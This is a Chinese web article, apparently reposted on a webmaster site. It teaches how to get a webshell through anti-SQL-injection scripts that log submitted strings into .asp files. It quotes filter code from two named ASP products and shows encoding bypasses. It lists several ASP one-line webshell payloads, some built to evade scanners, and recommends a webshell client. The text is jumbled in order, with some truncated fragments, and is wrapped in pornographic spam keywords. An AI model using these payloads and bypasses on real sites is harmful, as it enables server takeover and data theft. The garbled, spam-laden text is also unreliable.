亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 腳本攻防 查看內(nèi)容

一句話木馬后門在防注入中的重生

2022-9-27 10:02| 查看: 2510 |來源: 互聯(lián)網(wǎng)

對于目前流行的sql注入,程序員在編寫程序時,都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,同時也把非法提交的數(shù)據(jù)寫入了系統(tǒng)的后綴為A

對于目前流行的sql注入,程序員在編寫程序時,都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,同時也把非法提交的數(shù)據(jù)寫入了系統(tǒng)的后綴為ASP的文件中,這也給了我們一些可利用的地方,大家知道,一句話馬就是利用程序過濾的不完全而寫入的,按照這思路,我們是否可以在提交非法參數(shù)中加入一句話馬而防注入程序就會記錄我們提交的數(shù)據(jù)和一句話馬并寫入數(shù)據(jù)庫,從而得到一個WEBSHELL呢?呵呵,答案是肯定的,但對于要寫入的一句話馬如何繞過過濾的程序,卻是個難題,常見的一句話馬格式為”<%execute request(“a”)%>,而<%%>就很難繞過HTML的過濾, 但我們可以通過不同的方法來繞過,下面我分別以二個系統(tǒng)來講解:

打開”http://127.0.0.1/2005/sia-log.asp,出現(xiàn)了”類型不匹配:’execute’,顯示內(nèi)部錯誤的IE選項顯示好友錯誤鉤掉就可以了。我們再用一句話客戶端來接連上傳后成功得到一個WEBSHELL。

例二:再談?wù)劇?快樂視聽音樂網(wǎng) V4.0版本”系統(tǒng)的利用和分析:

系統(tǒng)加強防sql注入, 取消Asp頁面, 對不友好的IP或IP段進行封鎖。自動封注入者Ip功能,使注入者不能再訪問本站!可后臺管理、顯示系統(tǒng)界面。當(dāng)在參數(shù)后提交非法數(shù)據(jù)時,系統(tǒng)自動記錄你的IP地址,提交的非法參數(shù)和動作等,然后系統(tǒng)屏蔽了你的IP地址,
讓你再無法訪問網(wǎng)站。我們先看下防注入sql.asp文件中的部分代碼,讀過防注入代碼的人一眼就能看出來這個文件是個修改版的。

[code] <% ‘——–說明—————— ‘SQL防注入加強版 ‘——–數(shù)據(jù)庫連接部分————– dim dbkillSql,killSqlconn,connkillSql dbkillSql="data/#sql.asp" ‘On Error Resume Next Set killSqlconn = Server.CreateObject("ADODB.Connection") connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql) killSqlconn.Open connkillSql If Err Then err.Clear Set killSqlconn = Nothing Response.Write "數(shù)據(jù)庫連接出錯,請檢查連接字串。" Response.End End If ‘——–定義部份—————— Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql ‘自定義需要過濾的字串,用 "|" 分隔 Fy_In = "’|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare" Kill_IP=True WriteSql=True 以下略過 在sql.asp文件中,對下面出現(xiàn)在”|”分隔中的字符進行了攔截: Fy_In = "’|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"[/code]

也就說明了只有提交這些出現(xiàn)在”|”分隔的被過濾的字符串,才會被防注入系統(tǒng)寫入數(shù)據(jù)庫中而且是被寫入到data目錄中的#sql.asp文件中,其后綴為.asp的,剛好可以被我們利用,

同樣的道理,當(dāng)你提交"<%execute request(chr(97))%>時,%被過濾了

我們把一句話小馬加密成"<%25execute request(chr(97))%25>"還是被過濾了,因為%還是存在我們把一句話改成"這樣整句中就沒有出現(xiàn)“%“,提交后則成功完整的被寫入

用一句話客戶端連接并提交成功得到WEBSHELL。如果連接出錯,換個一句話連接工具laker2的不錯。

總結(jié):

以上只是對這二個系統(tǒng)出現(xiàn)的漏洞一個方面的分析和利用,當(dāng)然這類系統(tǒng)也存在著其它方面的漏洞如cookie的注入

例一西亞購物系統(tǒng)的利用和分析:

“西亞購物系統(tǒng)做了全面性安全處理, ‘?dāng)?shù)據(jù)庫防下載處理/CONN防止暴庫處理/防止跨站腳本攻擊/SQL注入式攻擊防范/禁止脫機瀏覽工具/前臺登陸驗證碼/后臺登陸驗證碼/

‘會員密碼MD5加密/管理員密碼MD5加密/數(shù)據(jù)來源安全性監(jiān)測/sql注入代碼過濾/HTML代碼過濾及防護/管理員登陸日至記錄/攻擊記錄及惡意IP屏蔽/非法操作代碼日至記錄/吧安全網(wǎng) “

當(dāng)我們在參數(shù)提交非法參數(shù)時,彈出防注入的頁面
    大家看到這時我們已轉(zhuǎn)到”http://127.0.0.1/2005/Error.asp?allquery=id=381’的這個頁面上了我們來看conn.asp文件中部分防注入的代碼,代碼太長就貼點關(guān)鍵,百度老說老子文章長

if InStr(allquery,"%20")<>0 or InStr(allquery,"%27")<>0 or InStr(allquery,"’")<>0 or InStr(allquery,"%a1a1")<>0 or InStr(allquery,"%24")<>0 or InStr(allquery,"$")<>0 or InStr(allquery,"%3b")<>0 or InStr(allquery,";")<>0 or InStr(allquery,":")<>0 or InStr(allquery,"%%")<>0 or InStr(allquery,"%3c")<>0 or InStr(allquery,"<")<>0 or InStr(allquery,">")<>0 or InStr(allquery,"–")<>0 or InStr(allquery,"sp_")<>0 or InStr(allquery,"xp_")<>0 or InStr(allquery,"exec")<>0 or InStr(allquery,"/")<>0 or InStr(allquery,"delete")<>0 or InStr(allquery,"dir")<>0 or InStr(allquery,"exe")<>0 or InStr(allquery,"select")<>0 or InStr(allquery,"Update")<>0 or InStr(allquery,"cmd")<>0 or InStr(allquery,"*")<>0 or InStr(allquery,"^")<>0 or InStr(allquery,"(")<>0 or InStr(allquery,")")<>0 or InStr(allquery,"+")<>0 or InStr(allquery,"copy")<>0 or InStr(allquery,"format")<>0 then%>

對提交的非法數(shù)據(jù)中包含以上被搜索到的字符串的話,就自動跳轉(zhuǎn)到”Error.asp的頁面去,而在”Error.asp文件中有以下部分代碼:

 

[code] toppath = Server.Mappath("sia-log.asp") Set fs = CreateObject("scripting.filesystemobject") If Not Fs.FILEEXISTS(toppath) Then Set Ts = fs.createtextfile(toppath, True) . . Set Ts= Fs.OpenTextFile(toppath,1) Do While Not Ts.AtEndOfStream Errorlog = Errorlog & Ts.ReadLine & chr(13) & chr(10) [/code]

當(dāng)你提交非法數(shù)據(jù)時,程序就會獲得你的IP,并創(chuàng)建一個FSO對象,再利用FSO對象自動創(chuàng)建sia_log.asp文件,并將非法提交的字符寫入文件中

打開” http://127.0.0.1/2005/sia-log.aspp頁面,則看到文件記錄了我們剛才提交的數(shù)據(jù),如圖:

這說明我們剛才的提交的非法參數(shù)已寫入了這個文件中,

3:那么,我們在這個頁面的參數(shù)后插入一句話如何
卻沒有彈出相應(yīng)的對話框,說明沒有寫入到sia-log.as這個文件中,我們把地址換成” http://127.0.0.1/2005/Error.asp?allquery=id=381”再來試試,如圖

提交后彈出我們希望看到的頁面。

可我們再打開”sia-log.asp”文件卻看到小馬被過濾了成 %號和"都過濾了。從這兒,我們知道%被過濾掉了而小寫a旁雙引號被轉(zhuǎn)換了,大家自己比較下,好了,知道這點,我們就可以重新構(gòu)造我們的小馬了。其實繞過這個還是很簡單的。因為一句話寫法很多。

備份專用

<%eval(request("a")):response.end%>

asp一句話
<%execute(request("1"))%>

php一句話

aspx一句話

可以躲過雷客圖的一句話。

<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>’的asp一句話

不用雙引號的一句話。

<%eval request(chr(35))%>

這里我就用工具搗鼓一下,打開”注入字符轉(zhuǎn)換器”這款工具,把”<%” ,“execute 和request之間的空格及”(“a”)%>”相應(yīng)的進行轉(zhuǎn)換,這樣原一句話馬就被加密成” %3C%25execute+request%28%22%61%22%29%25%3E” 或轉(zhuǎn)換成<%25execute request(chr(97))%25>,分別提交后,我們打開sia-log.asp文件后,可以清楚看到,二次提交的一句馬都成功的被寫入到sia_log.asp文件中了,

本文最后更新于 2022-9-27 10:02,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        欧美欧美午夜aⅴ在线观看| 精品一区中文字幕| 日韩国产欧美在线播放| 国产精品乱码一区二三区小蝌蚪| 不卡视频一二三四| 久久久精品黄色| 久久99国产精品久久| 91国内精品野花午夜精品| 国产日韩精品一区| 成人爱爱电影网址| 韩国三级中文字幕hd久久精品| 国产欧美日韩另类视频免费观看| 亚洲在线免费播放| 亚洲日本va午夜在线电影| 亚洲一线二线三线久久久| 精品久久久久久最新网址| 成人夜色视频网站在线观看| 视频在线观看一区| 亚洲女与黑人做爰| 免费日韩伦理电影| 国产乱人伦偷精品视频免下载| 久久av中文字幕片| 福利视频网站一区二区三区| 97成人超碰视| 色偷偷久久一区二区三区| 日韩一级片网址| 国产日韩欧美精品一区| 97精品超碰一区二区三区| 国产精品88888| 99热这里都是精品| 色悠久久久久综合欧美99| 欧美xxx久久| 91亚洲资源网| 国产成人自拍网| 国产精品一线二线三线| 国产风韵犹存在线视精品| 在线综合+亚洲+欧美中文字幕| 亚洲精品videosex极品| 99精品视频中文字幕| 一区二区三区久久| www.亚洲人| 精品一区二区三区久久久| 国产精品成人午夜| 日韩电影网1区2区| 奇米影视7777精品一区二区| 国产精品网站导航| 欧美无砖专区一中文字| 国产一区二区成人久久免费影院| 六月婷婷色综合| 欧美精品久久天天躁| 国产成人精品影视| 久久精品视频一区二区三区| 成人美女在线观看| 欧美日韩国产免费| 久久精品72免费观看| 国产农村妇女毛片精品久久麻豆| 麻豆视频一区二区| 色哟哟在线观看一区二区三区| 亚洲综合久久久久| 亚洲成人激情av| 亚洲成人一区二区| 欧美日韩免费观看一区二区三区| 亚洲成人动漫在线免费观看| 99国产精品久久久| 欧美一级生活片| 欧美日韩精品欧美日韩精品| 91在线精品一区二区| 午夜精品久久久| 色综合天天综合| 中文字幕一区不卡| 黄色小说综合网站| 伊人夜夜躁av伊人久久| 亚洲女人的天堂| 一区二区久久久| 欧美激情综合网| 欧美性感一区二区三区| 亚洲精品成人在线| 亚洲日穴在线视频| 欧美日韩精品欧美日韩精品一| 久久久久9999亚洲精品| 久久综合av免费| 精品成人一区二区三区| 久久综合九色欧美综合狠狠| 国产欧美久久久精品影院| 国产精品国产馆在线真实露脸| 国产精品污污网站在线观看| 日韩经典一区二区| 久久久www成人免费毛片麻豆| 久久综合丝袜日本网| 中文字幕电影一区| 婷婷国产v国产偷v亚洲高清| 亚洲综合久久av| 91丨porny丨户外露出| 欧美影片第一页| 精品国产百合女同互慰| 欧美国产日本韩| 性久久久久久久| 处破女av一区二区| 欧美一区二区三区啪啪| 欧美精品一区二区精品网| 亚洲主播在线播放| av午夜一区麻豆| 久久免费视频一区| 一区二区三区欧美在线观看| 日韩二区在线观看| 成人av在线一区二区三区| 欧美日韩一区二区三区视频| 亚洲精品一线二线三线无人区| 夜夜夜精品看看| 欧美a级理论片| 欧美日韩一区 二区 三区 久久精品| 激情五月婷婷综合| 一区二区三区精品在线观看| 高清不卡在线观看| 中文字幕免费不卡| 国产一区美女在线| 7878成人国产在线观看| 国产一区二区不卡| 天天综合色天天综合| 欧美日本在线播放| 欧美性色aⅴ视频一区日韩精品| 亚洲丝袜另类动漫二区| 国产一区91精品张津瑜| 亚洲制服丝袜在线| 国产成人精品亚洲日本在线桃色| 久久99热狠狠色一区二区| 三级亚洲高清视频| 欧美三级乱人伦电影| 久久精品av麻豆的观看方式| 日本亚洲免费观看| 偷拍与自拍一区| 在线视频欧美精品| 国产在线日韩欧美| 一本久久a久久精品亚洲| 成人国产电影网| 精品亚洲成a人| 国产成人av一区| 日韩电影在线一区二区三区| 国产精品乱码久久久久久| 日韩欧美国产1| 欧美在线观看视频一区二区| 日韩一卡二卡三卡四卡| 国产aⅴ精品一区二区三区色成熟| 亚洲欧美激情插| 亚洲女与黑人做爰| 蜜臀va亚洲va欧美va天堂| 色综合久久综合| 亚洲免费av高清| 国产美女主播视频一区| 国产欧美日韩综合| 亚洲美女屁股眼交| 欧美xxxx老人做受| 99在线精品视频| 欧美日韩国产乱码电影| 欧美精品 日韩| 久久久不卡影院| 波多野结衣中文一区| 国产精品久久国产精麻豆99网站| 国产精品理论片在线观看| 亚洲欧美aⅴ...| 欧美三级视频在线观看| 国产成人在线电影| 欧美激情一区二区三区不卡| 欧美日韩另类一区| 欧美视频在线播放| 欧美成人vr18sexvr| 色综合久久久久网| 中文字幕不卡的av| 中文字幕在线观看一区二区| 日本va欧美va精品发布| 中文字幕欧美激情| 日韩欧美的一区二区| 91在线国产福利| 成人av网站在线观看| 亚洲人成网站精品片在线观看| 免费观看久久久4p| 国产丝袜美腿一区二区三区| 欧洲在线/亚洲| 欧美一区二区观看视频| 国产精品久久久久永久免费观看| 欧美高清性hdvideosex| 日韩欧美一级特黄在线播放| 972aa.com艺术欧美| 欧美高清www午色夜在线视频| 国产一区二区三区美女| 欧美一级在线免费| 日韩精品中文字幕一区二区三区| 26uuu国产在线精品一区二区| 久久综合九色综合97婷婷| 亚洲成人三级小说| 在线不卡的av| 六月丁香婷婷色狠狠久久| 亚洲精品在线观看视频| 国内精品伊人久久久久av影院 | 欧美色综合影院| 97久久精品人人澡人人爽| 国产一区二区三区四区在线观看 | 久久先锋影音av| 日韩制服丝袜av| 日韩电影一区二区三区|